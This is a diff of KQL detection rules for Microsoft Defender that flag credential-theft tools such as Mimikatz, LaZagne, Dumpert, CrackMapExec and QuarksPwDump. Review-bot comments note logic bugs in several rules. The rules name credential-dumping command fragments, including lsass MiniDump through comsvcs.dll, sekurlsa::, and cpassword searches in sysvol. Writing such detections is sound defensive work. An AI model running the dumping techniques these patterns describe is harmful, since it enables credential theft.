 | where (ProcessCommandLine contains "cpassword" and ProcessCommandLine contains "\\sysvol\\" and ProcessCommandLine contains ".xml") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
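Review bot: The File Access Of Signal Desktop Sensitive Data rule (the first hunk on this line) is emitted against DeviceRegistryEvents/RegistryKey although its own description is about reads of db.sqlite and config.json, so it can never fire; on top of that `RegistryKey endswith "\\AppData\\Roaming\\Signal*"` keeps the Sigma wildcard as a literal `*` and is ANDed with two other `endswith` terms, which is unsatisfiable. Rewrite the query as `DeviceFileEvents | where FolderPath contains "\\AppData\\Roaming\\Signal" and (FolderPath endswith "\\config.json" or FolderPath endswith "\\db.sqlite") and not(InitiatingProcessFolderPath endswith "\\signal-portable.exe" or InitiatingProcessFolderPath endswith "\\signal.exe")`. As far as I know DeviceFileEvents records creations, modifications, renames and deletions rather than plain reads, so this is only a partial proxy for the upstream file_access logsource; the header comment should say so, and the converter's logsource mapping for file_access looks wrong and should be fixed there rather than patched by hand.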
diff --git a/KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql b/KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql
index 67ec6831..44253237 100644
--- a/KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql
+++ b/KQL/rules/Credential Access/hacktool_crackmapexec_file_indicators.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - CrackMapExec File Indicators
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-03-11
-// Level: high
-// Description: Detects file creation events with filename patterns used by CrackMapExec.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-
-DeviceFileEvents
+// Title: HackTool - CrackMapExec File Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-03-11
+// Level: high
+// Description: Detects file creation events with filename patterns used by CrackMapExec.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceFileEvents
 | where FolderPath startswith "C:\\Windows\\Temp\\" and ((FolderPath matches regex "\\\\[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\.txt$" or FolderPath matches regex "\\\\[a-zA-Z]{8}\\.tmp$") or (FolderPath endswith "\\temp.ps1" or FolderPath endswith "\\msol.ps1"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql b/KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql
index 83fdab97..8ba0548f 100644
--- a/KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql
+++ b/KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - CrackMapExec Process Patterns
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-03-12
-// Level: high
-// Description: Detects suspicious process patterns found in logs when CrackMapExec is used
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-
-DeviceProcessEvents
+// Title: HackTool - CrackMapExec Process Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-12
+// Level: high
+// Description: Detects suspicious process patterns found in logs when CrackMapExec is used
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k ") and (ProcessCommandLine contains "tasklist /fi " and ProcessCommandLine contains "Imagename eq lsass.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) or (ProcessCommandLine contains "do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump" and ProcessCommandLine contains "\\Windows\\Temp\\" and ProcessCommandLine contains " full" and ProcessCommandLine contains "%%B") or (ProcessCommandLine contains "tasklist /v /fo csv" and ProcessCommandLine contains "findstr /i \"lsass\"")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql b/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql
index 0dfcd2dc..9c78eb72 100644
--- a/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql
+++ b/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_default_file.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Dumpert Process Dumper Default File
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-02-04
-// Level: critical
-// Description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-// False Positives:
-// - Very unlikely
-
-DeviceFileEvents
+// Title: HackTool - Dumpert Process Dumper Default File
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-02-04
+// Level: critical
+// Description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Very unlikely
+
+DeviceFileEvents
 | where FolderPath endswith "dumpert.dmp"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql b/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql
index c57008c1..42b6687c 100644
--- a/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql
+++ b/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Dumpert Process Dumper Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-02-04
-// Level: critical
-// Description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-// False Positives:
-// - Very unlikely
-
-DeviceProcessEvents
+// Title: HackTool - Dumpert Process Dumper Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-02-04
+// Level: critical
+// Description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Very unlikely
+
+DeviceProcessEvents
 | where MD5 startswith "09D278F9DE118EF09163C6140255C690" or ProcessCommandLine contains "Dumpert.dll"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql b/KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql
index e4f6d8f5..0ef97169 100644
--- a/KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql
+++ b/KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql
@@ -1,12 +1,12 @@
-// Title: Hacktool Execution - PE Metadata
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-04-27
-// Level: high
-// Description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.resource-development, attack.t1588.002, attack.t1003
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Hacktool Execution - PE Metadata
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-27
+// Level: high
+// Description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.resource-development, attack.t1588.002, attack.t1003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessVersionInfoCompanyName =~ "Cube0x0"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql b/KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql
index b406a4b5..d375b4e9 100644
--- a/KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql
+++ b/KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Hashcat Password Cracker Execution
-// Author: frack113
-// Date: 2021-12-27
-// Level: high
-// Description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1110.002
-// False Positives:
-// - Tools that use similar command line flags and values
-
-DeviceProcessEvents
+// Title: HackTool - Hashcat Password Cracker Execution
+// Author: frack113
+// Date: 2021-12-27
+// Level: high
+// Description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1110.002
+// False Positives:
+// - Tools that use similar command line flags and values
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-a " and ProcessCommandLine contains "-m 1000 " and ProcessCommandLine contains "-r ") or FolderPath endswith "\\hashcat.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql b/KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql
index cb8dc0bd..8de64364 100644
--- a/KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql
+++ b/KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Hydra Password Bruteforce Execution
-// Author: Vasiliy Burov
-// Date: 2020-10-05
-// Level: high
-// Description: Detects command line parameters used by Hydra password guessing hack tool
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1110, attack.t1110.001
-// False Positives:
-// - Software that uses the caret encased keywords PASS and USER in its command line
-
-DeviceProcessEvents
+// Title: HackTool - Hydra Password Bruteforce Execution
+// Author: Vasiliy Burov
+// Date: 2020-10-05
+// Level: high
+// Description: Detects command line parameters used by Hydra password guessing hack tool
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1110, attack.t1110.001
+// False Positives:
+// - Software that uses the caret encased keywords PASS and USER in its command line
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "^USER^" or ProcessCommandLine contains "^PASS^") and (ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql b/KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql
index 8210e8f2..677c2742 100644
--- a/KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql
+++ b/KQL/rules/Credential Access/hacktool_impacket_file_indicators.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - Impacket File Indicators
-// Author: The DFIR Report, IrishDeath
-// Date: 2025-05-19
-// Level: high
-// Description: Detects file creation events with filename patterns used by Impacket.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-
-DeviceFileEvents
+// Title: HackTool - Impacket File Indicators
+// Author: The DFIR Report, IrishDeath
+// Date: 2025-05-19
+// Level: high
+// Description: Detects file creation events with filename patterns used by Impacket.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceFileEvents
 | where FolderPath matches regex "\\\\sessionresume_[a-zA-Z]{8}$"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_inveigh_execution.kql b/KQL/rules/Credential Access/hacktool_inveigh_execution.kql
index dedcb6d2..22c86a54 100644
--- a/KQL/rules/Credential Access/hacktool_inveigh_execution.kql
+++ b/KQL/rules/Credential Access/hacktool_inveigh_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Inveigh Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-24
-// Level: critical
-// Description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-// False Positives:
-// - Very unlikely
-
-DeviceProcessEvents
+// Title: HackTool - Inveigh Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-24
+// Level: critical
+// Description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Very unlikely
+
+DeviceProcessEvents
 | where FolderPath endswith "\\Inveigh.exe" or (ProcessVersionInfoOriginalFileName in~ ("\\Inveigh.exe", "\\Inveigh.dll")) or ProcessVersionInfoFileDescription =~ "Inveigh" or (ProcessCommandLine contains " -SpooferIP" or ProcessCommandLine contains " -ReplyToIPs " or ProcessCommandLine contains " -ReplyToDomains " or ProcessCommandLine contains " -ReplyToMACs " or ProcessCommandLine contains " -SnifferIP")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_krbrelay_execution.kql b/KQL/rules/Credential Access/hacktool_krbrelay_execution.kql
index a733abc0..49d8fb86 100644
--- a/KQL/rules/Credential Access/hacktool_krbrelay_execution.kql
+++ b/KQL/rules/Credential Access/hacktool_krbrelay_execution.kql
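Review bot: The clause `ProcessVersionInfoOriginalFileName in~ ("\\Inveigh.exe", "\\Inveigh.dll")` on the new `| where` line can never match, because the PE OriginalFileName field carries a bare file name without any path, so the leading backslash leaves both values dead and only the FolderPath, FileDescription and command-line clauses contribute to the detection. The intended form is visible elsewhere in this diff: the KrbRelay rule tests `ProcessVersionInfoOriginalFileName =~ "KrbRelay.exe"` with no separator. Suggested: `ProcessVersionInfoOriginalFileName in~ ("Inveigh.exe", "Inveigh.dll")`. The old side carries the same text, so this is presumably a field-mapping issue in the conversion backend rather than something introduced here; fixing it there would cover every regenerated rule that uses path-style OriginalFileName values.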
@@ -1,12 +1,12 @@
-// Title: HackTool - KrbRelay Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-04-27
-// Level: high
-// Description: Detects the use of KrbRelay, a Kerberos relaying tool
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1558.003
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: HackTool - KrbRelay Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-27
+// Level: high
+// Description: Detects the use of KrbRelay, a Kerberos relaying tool
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1558.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -spn " and ProcessCommandLine contains " -clsid " and ProcessCommandLine contains " -rbcd ") or (ProcessCommandLine contains "shadowcred" and ProcessCommandLine contains "clsid" and ProcessCommandLine contains "spn") or (ProcessCommandLine contains "spn " and ProcessCommandLine contains "session " and ProcessCommandLine contains "clsid ") or (FolderPath endswith "\\KrbRelay.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelay.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_lazagne_execution.kql b/KQL/rules/Credential Access/hacktool_lazagne_execution.kql
index a266e7c9..1a421573 100644
--- a/KQL/rules/Credential Access/hacktool_lazagne_execution.kql
+++ b/KQL/rules/Credential Access/hacktool_lazagne_execution.kql
@@ -1,13 +1,13 @@
-// Title: HackTool - LaZagne Execution
-// Author: Nasreddine Bencherchali, Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2024-06-24
-// Level: medium
-// Description: Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer.
-// LaZagne has been leveraged multiple times by threat actors in order to dump credentials.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access
-// False Positives:
-// - Some false positive is expected from tools with similar command line flags.
-
-DeviceProcessEvents
+// Title: HackTool - LaZagne Execution
+// Author: Nasreddine Bencherchali, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2024-06-24
+// Level: medium
+// Description: Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer.
+// LaZagne has been leveraged multiple times by threat actors in order to dump credentials.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access
+// False Positives:
+// - Some false positive is expected from tools with similar command line flags.
+
+DeviceProcessEvents
 | where (((ProcessCommandLine endswith ".exe all" or ProcessCommandLine endswith ".exe browsers" or ProcessCommandLine endswith ".exe chats" or ProcessCommandLine endswith ".exe databases" or ProcessCommandLine endswith ".exe games" or ProcessCommandLine endswith ".exe git" or ProcessCommandLine endswith ".exe mails" or ProcessCommandLine endswith ".exe maven" or ProcessCommandLine endswith ".exe memory" or ProcessCommandLine endswith ".exe multimedia" or ProcessCommandLine endswith ".exe sysadmin" or ProcessCommandLine endswith ".exe unused" or ProcessCommandLine endswith ".exe wifi" or ProcessCommandLine endswith ".exe windows") and (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Tmp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\$Recycle.bin" or FolderPath contains "\\AppData\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Favorites\\" or FolderPath contains "\\Links\\" or FolderPath contains "\\Music\\" or FolderPath contains "\\Photos\\" or FolderPath contains "\\Pictures\\" or FolderPath contains "\\Saved Games\\" or FolderPath contains "\\Searches\\" or FolderPath contains "\\Users\\Contacts\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\Searches\\" or FolderPath contains "\\Videos\\" or FolderPath contains "\\Windows\\addins\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\IME\\")) or FolderPath endswith "\\lazagne.exe") or ((ProcessCommandLine contains " all " or ProcessCommandLine contains " browsers " or ProcessCommandLine contains " chats " or ProcessCommandLine contains " databases " or ProcessCommandLine contains " games " or ProcessCommandLine contains " mails " or ProcessCommandLine contains " maven " or ProcessCommandLine contains " memory " or 
ProcessCommandLine contains " multimedia " or ProcessCommandLine contains " php " or ProcessCommandLine contains " svn " or ProcessCommandLine contains " sysadmin " or ProcessCommandLine contains " unused " or ProcessCommandLine contains " wifi ") and (ProcessCommandLine contains "-1Password" or ProcessCommandLine contains "-apachedirectorystudio" or ProcessCommandLine contains "-autologon" or ProcessCommandLine contains "-ChromiumBased" or ProcessCommandLine contains "-coreftp" or ProcessCommandLine contains "-credfiles" or ProcessCommandLine contains "-credman" or ProcessCommandLine contains "-cyberduck" or ProcessCommandLine contains "-dbvis" or ProcessCommandLine contains "-EyeCon" or ProcessCommandLine contains "-filezilla" or ProcessCommandLine contains "-filezillaserver" or ProcessCommandLine contains "-ftpnavigator" or ProcessCommandLine contains "-galconfusion" or ProcessCommandLine contains "-gitforwindows" or ProcessCommandLine contains "-hashdump" or ProcessCommandLine contains "-iisapppool" or ProcessCommandLine contains "-IISCentralCertP" or ProcessCommandLine contains "-kalypsomedia" or ProcessCommandLine contains "-keepass" or ProcessCommandLine contains "-keepassconfig" or ProcessCommandLine contains "-lsa_secrets" or ProcessCommandLine contains "-mavenrepositories" or ProcessCommandLine contains "-memory_dump" or ProcessCommandLine contains "-Mozilla" or ProcessCommandLine contains "-mRemoteNG" or ProcessCommandLine contains "-mscache" or ProcessCommandLine contains "-opensshforwindows" or ProcessCommandLine contains "-openvpn" or ProcessCommandLine contains "-outlook" or ProcessCommandLine contains "-pidgin" or ProcessCommandLine contains "-postgresql" or ProcessCommandLine contains "-psi-im" or ProcessCommandLine contains "-puttycm" or ProcessCommandLine contains "-pypykatz" or ProcessCommandLine contains "-Rclone" or ProcessCommandLine contains "-rdpmanager" or ProcessCommandLine contains "-robomongo" or ProcessCommandLine contains 
"-roguestale" or ProcessCommandLine contains "-skype" or ProcessCommandLine contains "-SQLDeveloper" or ProcessCommandLine contains "-squirrel" or ProcessCommandLine contains "-tortoise" or ProcessCommandLine contains "-turba" or ProcessCommandLine contains "-UCBrowser" or ProcessCommandLine contains "-unattended" or ProcessCommandLine contains "-vault" or ProcessCommandLine contains "-vaultfiles" or ProcessCommandLine contains "-vnc" or ProcessCommandLine contains "-winscp"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_mimikatz_execution.kql b/KQL/rules/Credential Access/hacktool_mimikatz_execution.kql
index 176f3c7c..51120b1c 100644
--- a/KQL/rules/Credential Access/hacktool_mimikatz_execution.kql
+++ b/KQL/rules/Credential Access/hacktool_mimikatz_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Mimikatz Execution
-// Author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton
-// Date: 2019-10-22
-// Level: high
-// Description: Detection well-known mimikatz command line arguments
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001, attack.t1003.002, attack.t1003.004, attack.t1003.005, attack.t1003.006
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: HackTool - Mimikatz Execution
+// Author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton
+// Date: 2019-10-22
+// Level: high
+// Description: Detection well-known mimikatz command line arguments
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001, attack.t1003.002, attack.t1003.004, attack.t1003.005, attack.t1003.006
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "::aadcookie" or ProcessCommandLine contains "::detours" or ProcessCommandLine contains "::memssp" or ProcessCommandLine contains "::mflt" or ProcessCommandLine contains "::ncroutemon" or ProcessCommandLine contains "::ngcsign" or ProcessCommandLine contains "::printnightmare" or ProcessCommandLine contains "::skeleton" or ProcessCommandLine contains "::preshutdown" or ProcessCommandLine contains "::mstsc" or ProcessCommandLine contains "::multirdp") or (ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "crypto::" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "process::" or ProcessCommandLine contains "vault::") or (ProcessCommandLine contains "DumpCreds" or ProcessCommandLine contains "mimikatz")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql b/KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql
index 61235ab3..b4b1fb24 100644
--- a/KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql
+++ b/KQL/rules/Credential Access/hacktool_mimikatz_kirbi_file_creation.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Mimikatz Kirbi File Creation
-// Author: Florian Roth (Nextron Systems), David ANDRE
-// Date: 2021-11-08
-// Level: critical
-// Description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1558
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: HackTool - Mimikatz Kirbi File Creation
+// Author: Florian Roth (Nextron Systems), David ANDRE
+// Date: 2021-11-08
+// Level: critical
+// Description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1558
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath endswith ".kirbi" or FolderPath endswith "mimilsa.log"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql b/KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql
index 2496574f..c040e029 100644
--- a/KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql
+++ b/KQL/rules/Credential Access/hacktool_nppspy_hacktool_usage.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - NPPSpy Hacktool Usage
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-11-29
-// Level: high
-// Description: Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access
-
-DeviceFileEvents
+// Title: HackTool - NPPSpy Hacktool Usage
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-11-29
+// Level: high
+// Description: Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access
+
+DeviceFileEvents
 | where FolderPath endswith "\\NPPSpy.txt" or FolderPath endswith "\\NPPSpy.dll"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql b/KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql
index b60b4fe2..c0800897 100644
--- a/KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql
+++ b/KQL/rules/Credential Access/hacktool_potential_remote_credential_dumping_activity_via_crackmapexec_or_impacket_secretsdump.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump
-// Author: SecurityAura
-// Date: 2022-11-16
-// Level: high
-// Description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003
-
-DeviceFileEvents
+// Title: HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump
+// Author: SecurityAura
+// Date: 2022-11-16
+// Level: high
+// Description: Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath matches regex "\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql b/KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql
index 87a112ad..6a049c08 100644
--- a/KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql
+++ b/KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - Pypykatz Credentials Dumping Activity
-// Author: frack113
-// Date: 2022-01-05
-// Level: high
-// Description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.002
-
-DeviceProcessEvents
+// Title: HackTool - Pypykatz Credentials Dumping Activity
+// Author: frack113
+// Date: 2022-01-05
+// Level: high
+// Description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "live" and ProcessCommandLine contains "registry") and (FolderPath endswith "\\pypykatz.exe" or FolderPath endswith "\\python.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql b/KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql
index a002049e..38dbfc39 100644
--- a/KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql
+++ b/KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - Quarks PwDump Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-05
-// Level: high
-// Description: Detects usage of the Quarks PwDump tool via commandline arguments
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.002
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: HackTool - Quarks PwDump Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-05
+// Level: high
+// Description: Detects usage of the Quarks PwDump tool via commandline arguments
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine in~ (" -dhl", " --dump-hash-local", " -dhdc", " --dump-hash-domain-cached", " --dump-bitlocker", " -dhd ", " --dump-hash-domain ", "--ntds-file")) or FolderPath endswith "\\QuarksPwDump.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql b/KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql
index fd78877b..37d91a8b 100644
--- a/KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql
+++ b/KQL/rules/Credential Access/hacktool_quarkspwdump_dump_file.kql
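Review bot: `ProcessCommandLine in~ (" -dhl", " --dump-hash-local", …, "--ntds-file")` on the new `| where` line is a whole-value equality test, so it only fires when the entire command line equals one of those fragments (most with a leading space), which does not occur in practice; the rule therefore reduces to `FolderPath endswith "\\QuarksPwDump.exe"` and the command-line indicators the description promises contribute nothing. The list needs a substring test, the way the sibling rules in this diff express their command-line indicators, i.e. `ProcessCommandLine contains " -dhl" or ProcessCommandLine contains " --dump-hash-local" or …` across all eight values (`has_any` is a term-based alternative, but the surrounding spaces would then need to be dropped). The old side carries the same `in~`, so this looks like how the conversion backend maps a list-valued contains modifier; fixing it there is more durable than patching this one file.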
@@ -1,10 +1,10 @@
-// Title: HackTool - QuarksPwDump Dump File
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018-02-10
-// Level: critical
-// Description: Detects a dump file written by QuarksPwDump password dumper
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.002
